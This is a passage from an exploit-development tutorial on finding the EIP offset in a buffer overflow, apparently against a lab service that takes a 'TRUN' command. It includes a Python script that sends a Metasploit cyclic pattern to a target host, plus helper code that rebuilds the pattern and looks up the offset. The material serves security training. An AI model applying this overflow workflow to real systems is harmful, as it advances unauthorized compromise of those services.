Finding the Offset
Metasploit already provides a tool to do this, found at /usr/share/metasploit-framework/tools/exploit/pattern_create.rb on Kali. Using the number found during our fuzzing, pass that value to this tool:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l NUMBER
You will get back a non-repeating pattern of characters, which you then add to the fuzzing script in place of the fuzz buffer, so it now looks something like this:
#!/usr/bin/python3
import sys, socket

# This string is what we get back from the pattern_create.rb tool
offset = "RANDOM_STRING"

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('TARGET_IP', PORT))
    # Python 3 sockets send bytes, so the string must be encoded first
    s.send(('TRUN /.:/' + offset).encode())
    s.close()
except:
    print("Error connecting to server")
    sys.exit()
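To see why the pattern lets you locate the overwrite, here is a small added example (my own code, not from this page or from Metasploit) that rebuilds the same "Aa0Aa1Aa2..." pattern and does the lookup that Metasploit's pattern_offset.rb performs on the four bytes found in EIP. The EIP value 0x386F4337 used in the check is a constructed sample.

```python
import string
import struct

# 26 * 26 * 10 triples of 3 chars: beyond this the pattern would repeat
MAX_UNIQUE = 26 * 26 * 10 * 3


def pattern_create(length: int) -> str:
    """Rebuild the Metasploit-style cyclic pattern of the given length.

    Every 4-byte window of the result is unique as long as
    length <= MAX_UNIQUE, which is what makes the offset lookup unambiguous.
    """
    if length > MAX_UNIQUE:
        raise ValueError(f"pattern longer than {MAX_UNIQUE} is no longer unique")
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern: str, eip_value: int) -> int:
    """Return the offset in `pattern` of the bytes that landed in EIP.

    On x86 the register is little-endian, so 0x386F4337 was filled from
    the bytes b"7Co8" in that order; pack it the same way and search.
    Returns -1 when the value is not part of the pattern (e.g. the crash
    overwrote EIP with something other than our input).
    """
    needle = struct.pack("<I", eip_value).decode("ascii", errors="replace")
    return pattern.find(needle)


if __name__ == "__main__":
    pat = pattern_create(3000)
    off = pattern_offset(pat, 0x386F4337)   # constructed sample EIP value
    print(f"EIP bytes {pat[off:off + 4]!r} found at offset {off}")
```

A match well inside the pattern (not -1) is the confirmation that EIP was overwritten by your input at that exact distance from the start of the buffer.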